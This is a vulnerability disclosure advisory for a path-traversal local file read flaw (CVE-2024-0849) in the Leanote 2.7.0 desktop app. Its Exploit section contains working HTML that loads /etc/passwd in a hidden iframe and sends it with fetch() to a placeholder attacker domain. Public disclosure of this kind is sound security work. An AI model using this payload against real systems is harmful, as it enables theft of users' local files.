---
slug: advisories/alesso/
title: Leanote 2.7.0 - Local File Read
authors: Carlos Bello
writer: cbello
codename: alesso
product: Leanote 2.7.0 - Local File Read
date: 2023-02-06 12:00 COT
cveid: CVE-2024-0849
severity: 5.5
description: Leanote 2.7.0           -            Local File Read
keywords: Fluid Attacks, Security, Vulnerabilities, LFR, Leanote, CVE
banner: advisories-bg
advise: yes
template: advisory
---

## Summary

<summary-table
    name="Leanote 2.7.0 - Local File Read"
    code="[Alesso](https://en.wikipedia.org/wiki/Alesso)"
    product="Leanote"
    affected-versions="Version 2.7.0"
    fixed-versions=""
    state="Public"
    release="">
</summary-table>

## Vulnerability

<vulnerability-table
    kind="Lack of data validation - Path Traversal"
    rule="[063. Lack of data validation - Path Traversal](https://help.fluidattacks.com/portal/en/kb/articles/criteria-vulnerabilities-063)"
    remote="No"
    vector="CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N"
    score="5.5"
    available="Yes"
    id="[CVE-2024-0849](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-0849)">
</vulnerability-table>

## Description

Leanote version 2.7.0 allows obtaining arbitrary local files. This is possible
because the application is vulnerable to LFR.

## Vulnerability

A local file read (LFR) vulnerability has been identified in Leanote that allows
an attacker to obtain arbitrary local files from the server. This was possible
because not all security considerations that an electron-based application should
have were followed.

## Exploit

### exploit.html

```html
<iframe src="file:///etc/passwd" style="display: none;" onload="leak_internal_file(this.contentDocument.body.innerText)"></iframe>

<script>
    function leak_internal_file(leak) {
        fetch("[MALICIOUS DOMAIN HERE]" + encodeURIComponent(btoa(leak)))
    }
</script>
```

### entrypoint.html

```html
<iframe src="file:///Users/retr02332/Documents/exploit.html" style="display: none;">
```

## Evidence of exploitation

<iframe src="https://shorturl.at/NSX23"
width="835" height="504" frameborder="0" title="LFR-Leanote-2.7.0"
webkitallowfullscreen mozallowfullscreen allowfullscreen controls
loading="lazy"></iframe>

## Our security policy

We have reserved the ID CVE-2024-0849 to refer to this issue from now on.

* https://fluidattacks.com/advisories/policy/

## System Information

* Version: Leanote 2.7.0

* Operating System: MacOS

## Mitigation

There is currently no patch available for this vulnerability.

## Credits

The vulnerability was discovered by [Carlos
Bello](https://www.linkedin.com/in/carlos-andres-bello) from Fluid Attacks'
Offensive Team.

## References

**Vendor page** <https://github.com/leanote/desktop-app>

## Timeline

<time-lapse
  discovered="2023-01-23"
  contacted="2023-01-23"
  replied=""
  confirmed=""
  patched=""
  disclosure="2023-02-06">
</time-lapse>
